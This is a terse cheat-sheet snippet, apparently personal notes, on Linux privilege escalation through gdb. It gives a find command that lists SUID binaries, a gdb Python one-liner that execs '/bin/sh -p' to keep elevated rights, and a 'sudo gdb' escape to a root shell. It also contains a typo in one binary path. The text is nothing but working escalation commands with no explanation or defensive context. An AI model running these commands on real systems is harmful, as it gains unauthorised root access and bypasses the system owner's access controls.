# /usr/bin/gdb

find / -perm /4000 2>/dev/null

**#find this**

/usr/bin/gbd

```
#shell escape
gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

#root
sudo gdb -nx -ex '!sh' -ex quit
```
